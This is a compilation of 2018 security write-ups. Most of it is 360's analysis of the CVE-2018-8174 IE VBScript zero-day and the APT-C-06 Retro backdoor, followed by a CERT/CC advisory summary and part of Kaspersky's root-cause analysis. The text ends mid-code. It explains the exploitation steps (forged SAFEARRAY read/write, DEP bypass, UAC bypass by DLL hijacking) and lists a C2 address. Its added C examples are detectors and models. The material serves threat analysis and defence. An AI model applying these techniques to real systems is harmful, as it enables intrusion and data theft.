Recently, the Advanced Threat Response Team of 360 Core Security Division detected an APT attack exploiting a 0-day vulnerability and captured the world’s first malicious sample that uses a browser 0-day vulnerability. We codenamed the exploit “double kill”. This vulnerability affects the latest version of Internet Explorer and applications that use the IE engine; users who browse the web or open Office documents are potential targets. Ultimately the attackers implant a backdoor Trojan to take complete control of the computer. We shared the relevant details of the 0-day vulnerability with Microsoft in a timely manner. The APT attack was analyzed and attributed upon detection, and we have now confirmed its association with the APT-C-06 group.

On April 18, 2018, as soon as 360 Core Security detected the malicious activity, we contacted Microsoft without any delay and submitted relevant details to Microsoft. Microsoft confirmed this vulnerability on the morning of April 20th and released an official security patch on May 8th. Microsoft has fixed the vulnerability and named it CVE-2018-8174. After the vulnerability was properly resolved, we published this report on May 9th, along with further technical disclosure of the attack and the 0day.

II Affection in China
According to the sample data, the regions of China affected by the attack are mainly provinces actively involved in foreign trade. Victims include trade agencies and related organizations.

III Attack Procedure Analysis
The lure documents captured in this attack are in Yiddish. The attackers abuse Office OLE autolink objects (CVE-2017-0199) to link the documents to malicious websites. All the exploits and malicious payloads were delivered from remote servers.

Once a victim opens the lure document, Word first visits a remote website hosting the IE VBScript 0-day (CVE-2018-8174) to trigger the exploit. The shellcode then sends several requests to fetch the payload from remote servers, and the payload is decrypted for the next stage of the attack.

While the payload runs, Word also drops three DLL backdoors locally. The backdoors are installed and executed through PowerShell and rundll32. A UAC bypass is used in this process, along with file steganography and reflective in-memory loading, in order to evade traffic detection and complete the loading without writing files to disk.

IV IE VBScript 0day (CVE-2018-8174)
1. Timeline
On April 18, 2018, the Advanced Threat Response Team of 360 Core Security Division detected a high-risk 0-day vulnerability. The vulnerability affects the latest version of Internet Explorer and applications that use the IE engine, and has been found to be used in targeted APT attacks. On the same day, 360 immediately contacted Microsoft and submitted details of the vulnerability. Microsoft confirmed the vulnerability on the morning of April 20th and released an official security patch on May 8th. The 0-day vulnerability was fixed and named CVE-2018-8174.

CVE-2018-8174 is a remote code execution vulnerability in the Windows VBScript engine. Attackers can embed malicious VBScript in an Office document or website and, whenever the user clicks, execute arbitrary code with the privileges of the current user.

2. Vulnerability Principles
Statistical analysis of the vulnerability samples showed that obfuscation was used heavily, so we removed all the duplicated obfuscation and renamed all the identifiers.

From the POC created from the captured exploit samples, the principle of the exploit is obvious. The POC sample is shown below:

Detailed procedures:

1) First, create a cla1 instance and assign it to b, then assign 0 to b; because b’s reference count is 1 at this point, cla1’s Class_Terminate function is called.
2) In Class_Terminate, assign b to c and then assign 0 to b again, to balance the reference count.
3) After Class_Terminate returns, the memory pointed to by the b object is released, so c now holds a pointer to the memory of the released object.
4) If another object is then used to occupy the freed memory, this leads to a classic use-after-free (UAF) or type confusion problem.

3. Exploitation
The 0-day exploit uses the UAF multiple times to achieve type confusion. It forges and overwrites an array object to gain arbitrary address read and write, and finally constructs an object to release code for execution. Code execution does not rely on traditional ROP or “GodMode”, but instead lays out the shellcode through the script to keep exploitation stable.

Fake array to perform arbitrary address reading and writing
The mem members of the two classes created through the UAF are offset by 0x0c bytes, and an array of size 0x7fffffff is forged through read and write operations on the two mem members.

typedef struct tagSAFEARRAY {
    USHORT cDims;                 // cDims = 0x0001
    USHORT fFeatures;             // fFeatures = 0x0880
    ULONG cbElements;             // bytes occupied by one element (1 byte)
    ULONG cLocks;
    PVOID pvData;                 // data buffer starts at address 0x0
    SAFEARRAYBOUND rgsabound[1];
} SAFEARRAY, *LPSAFEARRAY;

typedef struct tagSAFEARRAYBOUND {
    ULONG cElements;              // number of elements (0x7fffffff, the whole user space)
    LONG lLbound;                 // initial index value (starting from 0)
} SAFEARRAYBOUND, *LPSAFEARRAYBOUND;

The forged array is a one-dimensional array with 0x7fffffff elements, each occupying 1 byte, whose element memory address is 0. So the memory accessible through the array spans 0x00000000 to 0x7fffffff * 1, i.e. the array can read and write any address in user space. However, the storage type of lIlIIl is string, so attackers can only achieve this by changing the data type to 0x200C, i.e. VT_VARIANT|VT_ARRAY (array type).
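As an added example (not code from the 360 report), the 32-bit SAFEARRAY layout above written out with fixed-width types, together with a memory-forensics heuristic that flags a header of the forged shape (cDims 1, cbElements 1, pvData 0, 0x7fffffff elements) in a process dump; the sample dump bytes and the 0x02a40000 data pointer of the legitimate array are constructed.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* 32-bit OLE automation layouts (IE hosts the VBScript engine in a 32-bit
 * process), written with fixed-width types so this compiles on any platform. */
typedef struct {
    uint32_t cElements;   /* number of elements */
    int32_t  lLbound;     /* lower bound of the index */
} SAFEARRAYBOUND32;

typedef struct {
    uint16_t cDims;       /* dimensions; 1 in the forged array */
    uint16_t fFeatures;   /* 0x0880 in the forged array */
    uint32_t cbElements;  /* bytes per element; 1 in the forged array */
    uint32_t cLocks;
    uint32_t pvData;      /* 32-bit pointer to the data; 0 in the forged array */
    SAFEARRAYBOUND32 rgsabound[1];
} SAFEARRAY32;            /* 24 bytes */

/* VARIANT type codes (wtypes.h) */
#define VT_BSTR    0x0008
#define VT_VARIANT 0x000C
#define VT_ARRAY   0x2000

/* The type the exploit rewrites into the VARIANT: VT_VARIANT|VT_ARRAY == 0x200C. */
static int vt_is_variant_array(uint16_t vt)
{
    return vt == (VT_VARIANT | VT_ARRAY);
}

/* Highest address a one-dimensional SAFEARRAY lets the script reach. */
static uint64_t safearray_last_address(const SAFEARRAY32 *sa)
{
    uint64_t span = (uint64_t)sa->rgsabound[0].cElements * sa->cbElements;
    return (uint64_t)sa->pvData + span - 1;
}

/* Forensic heuristic: a NULL data pointer with an extent covering the whole
 * 2 GB user range cannot come from a real allocation, so a header like this
 * found in a process dump is the forged read/write primitive. */
static int safearray_is_forged(const SAFEARRAY32 *sa)
{
    if (sa->cDims != 1 || sa->cbElements != 1 || sa->pvData != 0)
        return 0;
    return safearray_last_address(sa) >= 0x7ffffffeULL;
}

/* Scan a dump at 4-byte alignment (heap granularity) and return the offset
 * of the first header matching the forged pattern, or -1 if none. */
static long find_forged_safearray(const uint8_t *buf, size_t len)
{
    for (size_t off = 0; off + sizeof(SAFEARRAY32) <= len; off += 4) {
        SAFEARRAY32 sa;
        memcpy(&sa, buf + off, sizeof sa);   /* avoid unaligned reads */
        if (safearray_is_forged(&sa))
            return (long)off;
    }
    return -1;
}

/* Constructed sample "dump": 8 bytes of filler, a legitimate 16-element
 * array, then the forged one. Returns the number of bytes written. */
static size_t build_sample_dump(uint8_t *out, size_t cap)
{
    SAFEARRAY32 legit  = { 1, 0x0880, 1, 0, 0x02a40000, { { 16, 0 } } };
    SAFEARRAY32 forged = { 1, 0x0880, 1, 0, 0,          { { 0x7fffffff, 0 } } };
    size_t need = 8 + 2 * sizeof(SAFEARRAY32);
    if (cap < need)
        return 0;
    memset(out, 0, 8);
    memcpy(out + 8, &legit, sizeof legit);
    memcpy(out + 8 + sizeof legit, &forged, sizeof forged);
    return need;
}

/* Builds the sample and returns where the scan locates the forged header. */
static long sample_forged_offset(void)
{
    uint8_t dump[64];
    size_t n = build_sample_dump(dump, sizeof dump);
    return find_forged_safearray(dump, n);
}

int main(void)
{
    printf("forged SAFEARRAY header at offset %ld\n", sample_forged_offset());
    printf("0x200C is VT_VARIANT|VT_ARRAY: %d\n", vt_is_variant_array(0x200C));
    return 0;
}
```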

Read the storage data of the specified parameter

In the malicious code, the function above is used to read the data at the memory address given by its parameter. The idea is to gain an arbitrary memory read through the way lenb(bstr xx) works in VBScript (the string data type in VBS is BSTR): the 4 bytes preceding a string’s address hold its length, so the bstr content, type and size fields can be used to read a chosen address.

As shown in the code above, if the input argument is addr (0x11223344), the function first adds 4 to get 0x11223348 and then sets the variant type to 8 (string type). It then calls the len function: when vbscript finds a BSTR type, it assumes the preceding 4 bytes (at 0x11223344) hold the string length, so the len function returns the value stored at the specified memory address.

Obtain Key DLL Base Address
The attacker leaks the virtual function table address of the CScriptEntryPoint object in the following way, which belongs to Vbscript.dll.

Obtain the vbscript.dll base address in the following way.

Because vbscript.dll imports msvcrt.dll, the base address of msvcrt.dll was obtained by traversing the vbscript.dll import table; msvcrt.dll in turn imports kernelbase.dll and ntdll.dll, from which the addresses of NtContinue and VirtualProtect were finally obtained.


Bypass DEP to execute shellcode
Use the arbitrary read and write to change the VAR type to 0x4d and then assign it the value 0, which makes the virtual machine call the VAR::Clear function.
The code is carefully controlled to execute ntdll!ZwContinue; its first parameter, the CONTEXT structure, is also carefully constructed by the attacker.
The first parameter of ZwContinue is a pointer to the CONTEXT structure. The CONTEXT structure is shown in the following figure, and the offset of EIP and ESP in CONTEXT can be calculated.

The values of Eip and Esp in the actual runtime CONTEXT, and the attacker’s intention, are shown in the figure below.

V Powershell Payload
After the bait DOC file is executed, it will start to execute the Powershell command to the next step payload.

First of all, Powershell will fuzzy match incoming parameter names, and it is case-insensitive.

Second step, decrypt the obfuscated command.

Next, the script uses a special User-Agent access URL page to request the next load and execute.

The size of the requested payload file is approximately 199K. The code fragment is as follows.


We found that this code was modified from Invoke-ReflectivePEInjection.ps1. buffer_x86 and buffer_x64 in the code are the same DLL compiled for 32-bit and 64-bit. The file’s export module name is ReverseMet.dll.

The DLL decrypts the IP address, port and sleep time from its configuration. The decryption algorithm XORs each byte with 0xA4 and subtracts 0x34; the code is as follows.

The decrypted configuration points to IP address 185.183.97.28, port 1021, from which the next stage is fetched and executed.
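An added example, not the 360 team’s code, of a configuration extractor built on the byte transform just described; the XOR-before-subtract order, the "<ip>:<port>:<sleep>" field layout and the 30-second sleep value are assumptions, and the encrypted blob is constructed from the C2 address quoted above.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* One byte of the Retro config: XOR with 0xA4, then subtract 0x34. That the
 * XOR comes first is an assumption drawn from the wording of the write-up. */
static uint8_t retro_decrypt_byte(uint8_t b)
{
    return (uint8_t)((b ^ 0xA4) - 0x34);
}

/* Inverse transform, used here only to construct the sample blob. */
static uint8_t retro_encrypt_byte(uint8_t b)
{
    return (uint8_t)((b + 0x34) ^ 0xA4);
}

/* Decrypts n bytes into out, which must hold n + 1 bytes; NUL-terminates. */
static void retro_decrypt(const uint8_t *in, size_t n, char *out)
{
    for (size_t i = 0; i < n; i++)
        out[i] = (char)retro_decrypt_byte(in[i]);
    out[n] = '\0';
}

/* Field layout "<ip>:<port>:<sleep seconds>" is constructed for this example;
 * the real sample's layout is not described in the write-up. Returns 1 when
 * all three fields parse and the port is in range. */
static int retro_parse_config(const char *cfg, char ip[64], int *port, int *sleep_s)
{
    if (sscanf(cfg, "%63[^:]:%d:%d", ip, port, sleep_s) != 3)
        return 0;
    return *port > 0 && *port <= 65535;
}

/* Constructed sample: the C2 from the write-up plus an assumed 30 s sleep,
 * encrypted with the inverse transform. Returns the blob length. */
static size_t build_sample_blob(uint8_t *out, size_t cap)
{
    const char *plain = "185.183.97.28:1021:30";
    size_t n = strlen(plain);
    if (cap < n)
        return 0;
    for (size_t i = 0; i < n; i++)
        out[i] = retro_encrypt_byte((uint8_t)plain[i]);
    return n;
}

/* Runs the extractor over the sample and returns the decoded port
 * (or -1 if decoding fails). */
static int sample_c2_port(void)
{
    uint8_t blob[64];
    char plain[65], ip[64];
    int port, sleep_s;
    size_t n = build_sample_blob(blob, sizeof blob);
    retro_decrypt(blob, n, plain);
    if (!retro_parse_config(plain, ip, &port, &sleep_s))
        return -1;
    printf("C2 %s port %d, sleep %d s\n", ip, port, sleep_s);
    return port;
}

int main(void)
{
    return sample_c2_port() == 1021 ? 0 : 1;
}
```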

After connecting to the TCP port, it first receives 4 bytes giving the size of the memory allocation to request. The data received next is written into that memory and executed as shellcode in a new thread. Since the port on the sample’s CC server is closed, we could not obtain the next stage for analysis.

VI UAC Bypass Payload
In addition to using PowerShell to load the payload, the bait DOC file also runs rundll32.exe to execute another backdoor locally. The backdoor program has several notable features: it uses a COM interface to copy files, achieving a UAC bypass and two system DLL hijacks; it abuses the DLLs loaded by default by cliconfg.exe and SearchProtocolHost.exe to benefit from application whitelisting; and during component delivery it uses file steganography and reflective in-memory loading to evade traffic monitoring and load without touching disk.

1. Retro backdoor execution
The backdoor program used in this attack is actually the Retro series backdoor known to be used by the APT-C-06 organization. The following is a detailed analysis of the implementation process of the backdoor program.

First execute the DLL disguised as a zlib library function with rundll32 and execute the backdoor installation functions uncompress2 and uncompress3.

It uses a COM interface for the UAC bypass, copying its own DLL to the System32 path for DLL hijacking; the hijacked targets are cliconfg.exe and SearchProtocolHost.exe.


Copy the DLL file in the AppData directory to the System32 directory through the COM interface and name it msfte.dll and NTWDBLIB.dll.

Then copy NTWDBLIB.dll to the System directory and execute the system’s own cliconfg to achieve DLL hijacking and load NTWDBLIB.dll.

The role of NTWDBLIB.dll is to restart the system service WSearch, and then start msfte.dll.


The script will then generate and execute the MO4TH2H0.bat file in the TEMP directory, which will delete the NTWDBLIB.DLL and its own BAT from the system directory.

Msfte.dll is the final backdoor program whose export is disguised as zlib. The core export functions are AccessDebugTracer and AccessRetailTracer. Its main function is to communicate with CC and further download and execute subsequent DLL programs.

Similar to the previously analyzed sample, it is also using image steganography and memory reflection loading. The decrypted CC communication information is as follows:

The format of the request is:

Hxxp://CC_Address /s7/config.php ?p=M&inst=7917&name=

Here, parameter p is the privilege level of the current process, with two possible values, M and H; inst is the current installation id; and name is the CC_name obtained by decryption, which in this case is pphp.
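An added example (not from the report) that turns the check-in format above into a proxy-log detection: it matches the /s7/config.php path with p in {M, H}, a numeric inst and a present name parameter. The log lines, timestamps, client addresses and the cc.invalid host are constructed.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Copy the value of key out of a query string "a=1&b=2" into out.
 * Returns the value length, or -1 if the key is absent. */
static int query_param(const char *query, const char *key, char *out, size_t cap)
{
    size_t klen = strlen(key);
    const char *p = query;
    while (*p) {
        const char *end = strchr(p, '&');
        size_t seg = end ? (size_t)(end - p) : strlen(p);
        if (seg > klen && strncmp(p, key, klen) == 0 && p[klen] == '=') {
            size_t vlen = seg - klen - 1;
            if (vlen >= cap) vlen = cap - 1;
            memcpy(out, p + klen + 1, vlen);
            out[vlen] = '\0';
            return (int)vlen;
        }
        if (!end) break;
        p = end + 1;
    }
    return -1;
}

/* Returns 1 when a URL matches the Retro check-in: path ending in
 * /s7/config.php, p in {M,H}, all-digit inst, and a name parameter.
 * The installation id is copied to inst_out when it is non-NULL. */
static int retro_beacon_match(const char *url, char *inst_out, size_t cap)
{
    const char *suffix = "/s7/config.php";
    size_t slen = strlen(suffix);
    const char *q = strchr(url, '?');
    if (!q || (size_t)(q - url) < slen || strncmp(q - slen, suffix, slen) != 0)
        return 0;
    char p[4], inst[32], name[64];
    if (query_param(q + 1, "p", p, sizeof p) != 1 || (p[0] != 'M' && p[0] != 'H'))
        return 0;
    int ilen = query_param(q + 1, "inst", inst, sizeof inst);
    if (ilen <= 0) return 0;
    for (int i = 0; i < ilen; i++)
        if (!isdigit((unsigned char)inst[i])) return 0;
    if (query_param(q + 1, "name", name, sizeof name) < 0) return 0;
    if (inst_out && cap > 0) {
        strncpy(inst_out, inst, cap - 1);
        inst_out[cap - 1] = '\0';
    }
    return 1;
}

/* Constructed proxy log: "<time> <client> <method> <url> <status>" per line.
 * Lines 1 and 3 are beacons; line 2 has a bad p value, line 4 a wrong path. */
static const char *sample_log =
"2018-05-09T10:21:07Z 10.0.0.12 GET http://cc.invalid/s7/config.php?p=M&inst=7917&name=pphp 200\n"
"2018-05-09T10:21:09Z 10.0.0.12 GET http://cdn.example/s7/config.php?p=X&inst=7917&name= 200\n"
"2018-05-09T10:22:11Z 10.0.0.31 GET http://cc.invalid/s7/config.php?p=H&inst=0042&name= 200\n"
"2018-05-09T10:23:00Z 10.0.0.31 GET http://www.example/index.php?p=M&inst=1&name=x 200\n";

/* Counts the log lines whose URL field matches the beacon pattern. */
static int count_retro_beacons(const char *log)
{
    int hits = 0;
    const char *line = log;
    while (*line) {
        const char *nl = strchr(line, '\n');
        size_t len = nl ? (size_t)(nl - line) : strlen(line);
        char buf[512], url[400];
        if (len >= sizeof buf) len = sizeof buf - 1;
        memcpy(buf, line, len);
        buf[len] = '\0';
        if (sscanf(buf, "%*s %*s %*s %399s", url) == 1 && retro_beacon_match(url, NULL, 0))
            hits++;
        if (!nl) break;
        line = nl + 1;
    }
    return hits;
}

int main(void)
{
    printf("Retro beacons in sample log: %d\n", count_retro_beacons(sample_log));
    return 0;
}
```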

After the download is decrypted, the process is exactly the same as the image steganography transmission format seen previously.

For the CC URL corresponding to the test request, we did not obtain the corresponding image during the analysis, so the CC is suspected to have failed.

In the implementation process, Retro disguised fake SSH and fake zlib, intended to obfuscate and interfere with users and analysts. Retro’s attack method has been used since 2016.

2. Retro backdoor evolvement
The backdoor program used in APT-C-06’s early APT operations was Lucker, a set of self-developed, customized modular Trojans. The set is powerful, with keylogging, voice recording, screen capture, file capture and USB drive operation functions, among others. Lucker’s name comes from the PDB path of this type of Trojan, because most of the backdoor’s functions use the LK abbreviation.

In the middle to late period we discovered its evolution into two different types of backdoor programs, which we named Retro and Collector after the PDB paths extracted from the programs. The Retro backdoor is an evolution of the Lucker backdoor and has been active in a series of attacks from 2016 until now. The name comes from the PDB path of this type of Trojan, which carries the label Retro, and the word Retro also appears in the initial installer.

C:\workspace\Retro\DLL-injected-explorer\zlib1.pdb
C:\workspace\Retro\RetroDLL\zlib1.pdb

The evolution of the reflective DLL injection technique can be found from the relevant PDB paths, and there are a lot of variants of this series of backdoors.

VII Attribution
1. Decryption Algorithm
During the analysis, we found the decryption algorithm that malware used is identical to APT-C-06’s decryption algorithm.

In the further analysis, we found the same decryption algorithm was used in the 64-bit version of the relevant malware.

2. PDB Path
The PDB path of the malware used in this attack has a string of “Retro”. It is one specific feature of Retro Trojan family.

3. Victims
In the process of tracing victims, we found one special compromised machine. It holds a large amount of malware related to APT-C-06. By looking at these samples in chronological order, the evolution of the malicious program can be clearly seen. The victim has been under constant attack by APT-C-06 since 2015. The early samples on the compromised machine could be associated with DarkHotel. Then it was attacked by the Lucker Trojan. Recently it was attacked using the 0-day vulnerability CVE-2018-8174.

VIII Conclusion
APT-C-06 is an overseas APT organization that has been active for a long time. Its main targets are China and some other countries, and its main purpose is to steal sensitive data and conduct cyber-espionage. DarkHotel can be regarded as one of its series of attack activities.
The attacks against China specifically targeted government, scientific research institutions and some particular fields. They can be dated back to 2007 and are still very active. Based on the evidence we have, the organization may be a hacker group or an intelligence agency supported by a foreign government.
The attacks against China have never stopped over the past 10 years, and the techniques the group uses keep evolving. Based on the data we captured in 2017, targets in China are trade-related institutions concentrated in provinces with frequent trading activities. The group has been conducting long-term monitoring of the targets to steal confidential data.
Over its years of cyber attacks, APT-C-06 has exploited several 0-day vulnerabilities and used complicated malware, with dozens of function modules and over 200 pieces of malicious code.
In April 2018, the Advanced Threat Response Team of 360 Core Security Division took the lead in capturing the group’s new APT attack using the 0-day vulnerability (CVE-2018-8174) in the wild, and then discovered a new type of attack: Office-related attacks exploiting 0-day VBScript vulnerabilities.
After capturing the new activity, we contacted Microsoft immediately and shared detailed information with them. Microsoft’s official security patch was released on 8th May. We have now published this detailed report to disclose and analyze the attack.

Further technical details including IoCs are reported in the analysis published by 360 Core Security Team at the following URL:

http://blogs.360.cn/blog/cve-2018-8174-en/


Misinterpretation of Intel docs is the root cause for the CVE-2018-8897 flaw in Hypervisors and OSs
10.5.2018 securityaffairs 
Vulnerebility

Developers of major operating systems and hypervisors misread documentation from Intel and introduced the CVE-2018-8897 vulnerability into their products.
The development communities of major operating systems and hypervisors misread documentation from Intel and introduced a potentially serious vulnerability to their products.

CERT/CC speculates that the root cause of the flaw is the developers’ misinterpretation of existing documentation provided by chip manufacturers.

“The MOV SS and POP SS instructions inhibit interrupts (including NMIs), data breakpoints, and single step trap exceptions until the instruction boundary following the next instruction” states the advisory published by CERT/CC.

The flaw, tracked as CVE-2018-8897, relates to the way operating systems and hypervisors handle MOV/POP to SS instructions.

“In some circumstances, some operating systems or hypervisors may not expect or properly handle an Intel architecture hardware debug exception. The error appears to be due to developer interpretation of existing documentation for certain Intel architecture interrupt/exception instructions, namely MOV to SS and POP to SS.” continues the security advisory published by CERT/CC.

The CVE-2018-8897 flaw was discovered by the security experts Nick Peterson of Everdox Tech and Nemanja Mulasmajic of triplefault.io.

CERT/CC published a security advisory to warn of the CVE-2018-8897 flaw, which impacts the Linux kernel and software developed by major tech firms including Apple, the DragonFly BSD Project, Red Hat, the FreeBSD Project, Microsoft, SUSE Linux, Canonical, VMware, and the Xen Project (CERT/CC published the complete list of companies whose products may be impacted).

An attacker needs local access to exploit the vulnerability and the impact depends on the specific vulnerable software. In the worst scenario, attackers can, potentially, gain access to sensitive memory information or control low-level operating system functions.

“Therefore, in certain circumstances after the use of certain Intel x86-64 architecture instructions, a debug exception pointing to data in a lower ring (for most operating systems, the kernel Ring 0 level) is made available to operating system components running in Ring 3.” continues the advisory.

“This may allow an attacker to utilize operating system APIs to gain access to sensitive memory information or control low-level operating system functions.”

Experts explained that in the case of Linux, the flaw can trigger a denial-of-service (DoS) condition or cause the crash of the kernel.

According to Microsoft, an attacker can exploit the security flaw on Windows for privilege escalation.

“An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.” reads Microsoft’s advisory.

“To exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application to take control of an affected system.”

Security patches for the CVE-2018-8897 flaw have been released for many operating systems, including the Linux kernel, Windows, Xen, and Red Hat.

Proof-of-concept (PoC) exploits have been released for Windows and Linux operating systems.


The King is dead. Long live the King!

10.5.2018 Kaspersky Vulnerebility
Root cause analysis of the latest Internet Explorer zero day – CVE-2018-8174
In late April 2018, a new zero-day vulnerability for Internet Explorer (IE) was found using our sandbox; more than two years since the last in the wild example (CVE-2016-0189). This particular vulnerability and subsequent exploit are interesting for many reasons. The following article will examine the core reasons behind the latest vulnerability, CVE-2018-8174.

Searching for the zero day
Our story begins on VirusTotal (VT), where someone uploaded an interesting exploit on April 18, 2018. This exploit was detected by several AV vendors including Kaspersky, specifically by our generic heuristic logic for some older Microsoft Word exploits.

Virustotal scan results for CVE-2018-8174

After the malicious sample was processed in our sandbox system, we noticed that a fully patched version of Microsoft Word was successfully exploited. From this point we began a deeper analysis of the exploit. Let’s take a look at the full infection chain:

Infection chain

The infection chain consists of the following steps:

A victim receives a malicious Microsoft Word document.
After opening the malicious document, a second stage of the exploit is downloaded; an HTML page containing VBScript code.
The VBScript code triggers a Use After Free (UAF) vulnerability and executes shellcode.
Initial analysis
We’ll start our analysis with the initial Rich Text Format (RTF) document that was used to deliver the actual exploit for IE. It contains only one object, and its contents are obfuscated using a known obfuscation technique we call “nibble drop”.

Obfuscated object data in RTF document

After deobfuscation and hex-decoding of the object data, we can see that this is an OLE object that contains a URL Moniker CLSID. Because of this, the exploit initially resembles an older vulnerability leveraging the Microsoft HTA handler (CVE-2017-0199).

URL Moniker is used to load an IE exploit

With the CVE-2017-0199 vulnerability, Word tries to execute the file with the default file handler based on its attributes, the Content-Type HTTP header in the server’s response being one of them. Because the default handler for the “application/hta” Content-Type is mshta.exe, it is chosen as the OLE server to run the script unrestricted. This allows an attacker to directly call ShellExecute and launch a payload of their choice.

However, if we follow the embedded URL in the latest exploit, we can see that the content type in the server’s response is not “application/hta”, which was a requirement for CVE-2017-0199 exploitation, but rather “text/html”. The default OLE server for “text/html” is mshtml.dll, the library that contains the engine behind Internet Explorer.

WINWORD.exe querying registry for correct OLE server

Furthermore, the page contains VBScript, which is loaded with the safemode flag set to its default value, ‘0xE’. Because this prevents an attacker from directly executing a payload, as was the case with the HTA handler, an Internet Explorer exploit is needed to overcome that.

Using a URL moniker like that to load a remote web page is possible because Microsoft’s patch for Moniker-related vulnerabilities (CVE-2017-0199, CVE-2017-8570 and CVE-2017-8759) introduced an activation filter, which allows applications to specify which COM objects are restricted from being instantiated at runtime.

Some of the filtered COM objects, restricted from creating by IActivationFilter in MSO.dll

At the time of this analysis, the list of filtered CLSIDs consisted of 16 entries. The MSHTML CLSID ({25336920-03F9-11CF-8FD0-00AA00686F13}) is not in the list, which is why the MSHTML COM server is successfully created in the Word context.

This is where it becomes interesting. Despite a Word document being the initial attack vector, the vulnerability is actually in VBScript, not in Microsoft Word. This is the first time we’ve seen a URL Moniker used to load an IE exploit, and we believe this technique will be used heavily by malware authors in the future. It allows one to load and render a web page using the IE engine, even if the default browser on a victim’s machine is set to something different.

The VBScript in the downloaded HTML page contains both function names and integer values that are obfuscated.

Obfuscated IE exploit

Vulnerability root cause analysis
For the root cause analysis we only need to look at the first function (‘TriggerVuln’) in the deobfuscated version which is called right after ‘RandomizeValues’ and ‘CookieCheck’.

Vulnerability Trigger procedure after deobfuscation

To achieve the desired heap layout and to guarantee that the freed class object memory will be reused with the ‘ClassToReuse’ object, the exploit allocates some class objects. To trigger the vulnerability this code could be minimized to the following proof-of-concept (PoC):

CVE-2018-8174 Proof Of Concept

When we then launch this PoC in Internet Explorer with page heap enabled we can observe a crash at the OLEAUT32!VariantClear function.

Access Violation on a call to freed memory

Freed memory pointer is reused when the second array (ArrB) is destroyed

With this PoC we were able to trigger a Use-after-free vulnerability; both ArrA(1) and ArrB(1) were referencing the same ‘ClassVuln’ object in memory. This is possible because when “Erase ArrA” is called, the vbscript!VbsErase function determines that the type of the object to delete is a SafeArray, and then calls OLEAUT32!SafeArrayDestroy.

It checks that the pointer to the tagSafeArray structure is not NULL and that its reference count, stored in the cLocks field, is zero, and then continues to call ReleaseResources.

VARTYPE of ArrA(1) is VT_DISPATCH, so VBScriptClass::Release is called to destruct the object

ReleaseResources, in turn, will check the fFeatures flags variable, and since we have an array of VARIANTs, it will subsequently call VariantClear, a function that iterates over each member of the array, performs the necessary deinitialization and calls the relevant class destructor if necessary. In this case, VBScriptClass::Release is called to destroy the object correctly and handle destructors like Class_Terminate, since the VARTYPE of ArrA(1) is VT_DISPATCH.

Root cause of CVE-2018-8174 – ‘refCount’ being checked only once, before TerminateClass function

This ends up being the root cause of the vulnerability. Inside the VBScriptClass::Release function, the reference count is checked only once, at the beginning of the function. Even though it can be (and actually is, in the PoC) incremented in an overloaded TerminateClass function, no checks will be made before finally freeing the class object.

Class_Terminate is a deprecated method, now replaced by the ‘Finalize’ procedure. It is used to free acquired resources during object destruction and is executed as soon as the object is set to Nothing and there are no more references to it. In our case, the Class_Terminate method is overloaded, and when a call to VBScriptClass::TerminateClass is made, it is dispatched to the overloaded method instead. Inside that overloaded method, another reference is created to the ArrA(1) member. At this point ArrB(1) references ArrA(1), which holds a soon-to-be-freed ClassVuln object.

Crash, due to calling an invalid virtual method when freeing second object

After the Class_Terminate sub is finished, the object at ArrA(1) is freed, but ArrB(1) still holds a reference to that freed class object. When execution continues and ArrB is erased, the whole cycle repeats, except that this time ArrB(1) references a freed ClassVuln object, so we observe a crash when one of the virtual methods in the ClassVuln vtable is called.
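The reference-count flow described above, as an added example that is not Kaspersky’s or Microsoft’s code: a small C model in which the names ScriptClass, escaping_terminate, release_vulnerable, release_fixed and run_scenario are hypothetical stand-ins for VBScriptClass, the overloaded Class_Terminate, VBScriptClass::Release and the PoC’s Erase ArrA / Erase ArrB sequence. Instead of calling free(), the model sets a destroyed flag so the dangling reference can be observed safely; it shows the single early check that lets the object die with a live reference, and the usual fix of stabilising the count during teardown and re-checking it afterwards.

```c
#include <stdio.h>

/*
 * Constructed model of the CVE-2018-8174 root cause. ScriptClass and the
 * functions below are hypothetical stand-ins; they do not reproduce the real
 * vbscript.dll object layout or code.
 */
typedef struct ScriptClass ScriptClass;
struct ScriptClass {
    long refCount;                           /* outstanding references             */
    void (*class_terminate)(ScriptClass *);  /* user-overloaded Class_Terminate    */
    ScriptClass **escape_slot;               /* stands in for ArrB(1)              */
    int escaped;                             /* hook smuggles a reference out once */
    int destroyed;                           /* set instead of calling free()      */
};

static void addref(ScriptClass *o) { o->refCount++; }

/* Mimics the exploit's overloaded Class_Terminate: while the object is being
 * torn down, it stores a fresh reference to itself in ArrB(1). */
static void escaping_terminate(ScriptClass *self)
{
    if (self->escaped) return;
    self->escaped = 1;
    *self->escape_slot = self;   /* Set ArrB(1) = ArrA(1) */
    addref(self);
}

/* Vulnerable pattern: refCount is tested once, before the destructor runs, and
 * the object is torn down even though the destructor added a reference.
 * Returns 1 if the object was destroyed on this call. */
int release_vulnerable(ScriptClass *o)
{
    if (--o->refCount != 0) return 0;            /* the only check         */
    if (o->class_terminate) o->class_terminate(o);
    o->destroyed = 1;                            /* freed with refCount 1  */
    return 1;
}

/* Hardened pattern: hold a temporary self-reference while the destructor runs
 * (so a nested Release cannot free the object), then re-test the count. A
 * destructor that resurrected the object leaves it alive. */
int release_fixed(ScriptClass *o)
{
    if (--o->refCount != 0) return 0;
    o->refCount = 1;                             /* stabilise during teardown */
    if (o->class_terminate) o->class_terminate(o);
    if (--o->refCount != 0) return 0;            /* resurrected: keep alive   */
    o->destroyed = 1;
    return 1;
}

/* Replays the PoC sequence (ArrA(1) = New ClassVuln; Erase ArrA; Erase ArrB)
 * against one Release strategy.
 * Returns 1 if ArrB(1) dangles after "Erase ArrA" (the use-after-free),
 *         0 if the object is destroyed exactly once, after its last reference,
 *        -1 if the scenario did not play out as expected. */
int run_scenario(int (*release)(ScriptClass *))
{
    ScriptClass obj = {0, escaping_terminate, 0, 0, 0};
    ScriptClass *arrA1 = &obj, *arrB1 = 0;
    obj.escape_slot = &arrB1;

    addref(&obj);                    /* Set ArrA(1) = New ClassVuln */
    release(arrA1);                  /* Erase ArrA                   */
    arrA1 = 0;
    if (arrB1 != &obj) return -1;    /* Class_Terminate did not run  */
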